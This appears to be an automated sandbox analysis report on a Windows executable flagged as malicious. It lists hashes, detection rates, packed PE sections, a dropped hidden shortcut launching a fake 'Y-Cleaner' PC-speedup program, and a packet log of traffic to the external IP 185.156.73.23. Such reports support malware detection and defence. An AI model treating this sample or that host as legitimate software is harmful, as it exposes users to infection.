MD5:	A8CF5621811F7FAC55CFE8CB3FA6B9F6
SHA1:	121356839E8138A03141F5F5856936A85BD2A474
SHA-256:	614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
SHA-512:	4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 75%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(......(.....~....-.r...p.....(....o....s.........~.....~...........j(....r=..p~....o....t....j(....rM..p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t....j(....r...p~....o....t.....~......(....Vs....(....t.........N.(.....(.....(........0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

C:\Users\user\Desktop\Cleaner.lnk

Process:	C:\Users\user\Desktop\BEd2lJRXFM.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 14:13:36 2024, mtime=Fri Dec 20 14:13:36 2024, atime=Fri Dec 20 14:13:36 2024, length=1502720, window=hide
Category:	dropped
Size (bytes):	2233
Entropy (8bit):	3.93901451574709
Encrypted:	false
SSDEEP:	48:8kx7uWRQGLkI5vNaWOY9WOWZRqWOAIyF:8TOBZNyIy
MD5:	232F59D902EEDCFA36BD80BC3159EAC4
SHA1:	F83C30EC3176EA2EAB45E2C837AAA31B1BDCA905
SHA-256:	7A49E0314513FF8F2BCA2321A3BC0A82C78B92801BB1F03601FF97C59442DBB0
SHA-512:	A196E55D07E898356E723608C5513710F38B305E4F671C3D42372EF84BF2466F305F16F08F7C8A46D2B7B4008948F46142F587DCDD48F99D7BBA86F54CE5E7FC
Malicious:	false
Preview:	L..................F.@.. ...v....R..v....R..v....R..........................F.:..DG..Yr?.D..U..k0.&...&......vk.v......-..R.......R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.y...........................%..A.p.p.D.a.t.a...B.P.1......Y.y..Local.<......CW.^.Y.y....b......................&..L.o.c.a.l.....N.1......Y.y..Temp..:......CW.^.Y.y....l.........................T.e.m.p.......1......Y.y..RW3K9D~1..j......Y.y.Y.y..........................l...R.W.3.K.9.d.2.N.3.G.7.5.2.3.V.W.A.E.K.e.2.F.3.Y.f.Y.1.G.....h.2......Y.y .Y-CLEA~1.EXE..L......Y.y.Y.y....s......................N..Y.-.C.l.e.a.n.e.r...e.x.e.......{...............-.......z...........*........C:\Users\user\AppData\Local\Temp\RW3K9d2N3G7523VWAEKe2F3YfY1G\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.@.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.R.W.3.K.9.d.2.N.3.G.7.5.2.3.V.W.A.E.K.e.2.F.3.Y.f.Y.1.G.\.Y.-.C.l.e.a.n.e.r...e.x.e.L.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465460111329309
Encrypted:	false
SSDEEP:	6144:TIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSbd:EXD94+WlLZMM6YFHK+d
MD5:	DDEBFB439B7B41D2EA9D4B95D9D37F5B
SHA1:	2F3F9D6E690D56788F132DD5BD563ADA512C627F
SHA-256:	FA3EE4CD5FF9CD85BF742B19AB3F67A7141FC50676409512D19A34C959A0EA10
SHA-512:	233F57AB88C5E199877A0273284B9F4411D486620C2C939751A4B7D4446F825F81D513863074DB204FDF81C8DF7D78F0751EF2FF4D0CC3F32416363920BE2C41
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..T..R..............................................................................................................................................................................................................................................................................................................................................U.C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.939829586585843
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BEd2lJRXFM.exe
File size:	1'980'416 bytes
MD5:	1f39fac8d8f8c1e3e0697ebf585af36c
SHA1:	f98243a6bdea8f7de4cfa02d157e94b1cf925f51
SHA256:	ec2349f4f55242a8328a7f11c5013a7525fa05aa18a680c1d82f2d6d93e6e1ad
SHA512:	ebf1551cc77e6f815f18ebd38ffc3b581fbc0b07642175db9178652e3cad6be0a38bf978ea09d46815ca64b1482a87261ac5e34303b14420ce89c7c684a7aaed
SSDEEP:	49152:gqvEiVW9Nwg8O4DXVGgGSpJm9FS2OEVRl/+Z6uwF:ZS8RTVG5SpkSyLmZa
TLSH:	5595331D9BB99BE9CFA7A6F5E8569DE70045498BD9A080FB721197F4EC83340C3CE940
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

File Icon


Icon Hash:	e7a99a8a8651790c

Static PE Info

General

Entrypoint:	0xc78000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F270CE4621Ah
movhps xmm3, qword ptr [esi]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x41805b	0x6f	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40d000	0xaea0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x870108	0x18	teawbsxt
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x40c000	0x24e00	6886b4560a15072900fd0c5715474dd5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x40d000	0xaea0	0x7000	aacd048be109b93deca01cfc322e1f91	False	0.9673549107142857	data	7.899588975503809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x418000	0x1000	0x200	b8539b83d0b3f253ed2a56b71af0554b	False	0.154296875	data	1.085758102617974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x419000	0x2aa000	0x200	fbb903515eec64e4a7da12de9b42c992	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
teawbsxt	0x6c3000	0x1b4000	0x1b3e00	1eca113bcb783c1a835097fa85628f10	False	0.990597890378549	data	7.9486883918253	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
afnwtvib	0x877000	0x1000	0x600	53fa73844f272539e503b99451631e6a	False	0.583984375	data	5.015351444545285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x878000	0x3000	0x2200	4205da11882c95506c00359ebf9c4f4a	False	0.006433823529411764	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x870168	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.7971748400852878
RT_ICON	0x871010	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.7838447653429603
RT_ICON	0x8718b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.7200460829493087
RT_ICON	0x871f80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.740606936416185
RT_ICON	0x8724e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.6840248962655602
RT_ICON	0x874a90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.7345215759849906
RT_ICON	0x875b38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.7622950819672131
RT_ICON	0x8764c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8111702127659575
RT_STRING	0x413c80	0x330	data			0.8394607843137255
RT_STRING	0x413fb0	0x170	data			0.15
RT_STRING	0x414120	0x620	empty			0
RT_STRING	0x414740	0x762	empty			0
RT_STRING	0x414ea4	0x852	empty			0
RT_STRING	0x4156f8	0x726	empty			0
RT_STRING	0x415e20	0x658	empty			0
RT_STRING	0x416478	0x6c0	empty			0
RT_STRING	0x416b38	0x638	empty			0
RT_STRING	0x417170	0x88a	empty			0
RT_ACCELERATOR	0x4179fc	0x20	empty			0
RT_GROUP_ICON	0x876928	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x87699e	0x1b4	data			0.5711009174311926
RT_MANIFEST	0x876b52	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 20, 2024 16:12:55.172096014 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:55.291832924 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:55.292025089 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:55.292274952 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:55.411948919 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:56.648180962 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:56.648293972 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:56.658144951 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:56.778502941 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.129405022 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.129558086 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.135395050 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.254976988 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.694912910 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.695013046 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.695023060 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.695027113 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.695077896 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.695563078 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.695575953 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.695609093 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.695671082 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.696237087 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.696250916 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.696296930 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.696923971 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.697010994 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.703248024 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.703907013 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.703916073 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.703980923 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.711644888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.711764097 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.711803913 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.711803913 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.881153107 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.881263018 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.882426977 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.882529020 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.885211945 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.885452986 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.885628939 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.885628939 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.893068075 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.893142939 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.893302917 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.894524097 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.901185036 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.901437044 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.901755095 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.901803017 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.909200907 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.909265995 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.909329891 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.910226107 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.917133093 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.917195082 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.917378902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.917579889 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.925061941 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.925122023 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.925192118 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.926517963 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.933178902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.933290005 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.933310032 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.934520006 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.940903902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.941073895 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.941122055 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.941122055 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.948853016 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.948928118 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.948987961 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.949084997 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.957048893 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.957112074 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.957207918 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.957293034 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.965014935 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.965166092 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:57.965166092 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:57.965739965 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.087946892 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.088059902 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.088084936 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.088167906 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.090445995 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.090594053 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.091128111 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.091330051 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.096685886 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.096792936 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.097152948 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.097237110 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.103349924 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.103431940 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.103468895 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.103468895 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.109821081 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.109988928 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.110326052 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.110371113 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.115750074 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.115838051 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.115905046 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.115943909 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.121651888 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.121948957 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.122741938 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.122912884 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.127846003 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.127907991 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.127975941 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.128082991 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.133934975 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.134001017 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.134521008 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.134588957 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.139200926 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.139218092 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.139265060 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.139265060 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.148425102 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.148442984 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.148525000 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.156914949 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.157207012 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.157249928 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.157249928 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.161756039 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.161909103 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.161950111 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.161950111 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.167082071 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.167403936 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.167435884 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.167512894 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.172467947 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.172534943 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.172611952 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.172662020 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.178356886 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.178401947 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.178546906 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.178678036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.184119940 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.184477091 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.184708118 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.184755087 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.188604116 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.188657045 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.189187050 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.189234018 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.191668034 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.191715956 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.192296028 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.192475080 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.287035942 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.287254095 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.287293911 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.287293911 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.289558887 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.289618015 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.289804935 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.289849043 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.295293093 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.295716047 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.295778036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.295778036 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.314369917 CET	49736	80	192.168.2.4	185.156.73.23
Dec 20, 2024 16:12:58.433881998 CET	80	49736	185.156.73.23	192.168.2.4
Dec 20, 2024 16:12:58.796657085 CET	80	49736	185.156.73.23	192.168.2.4
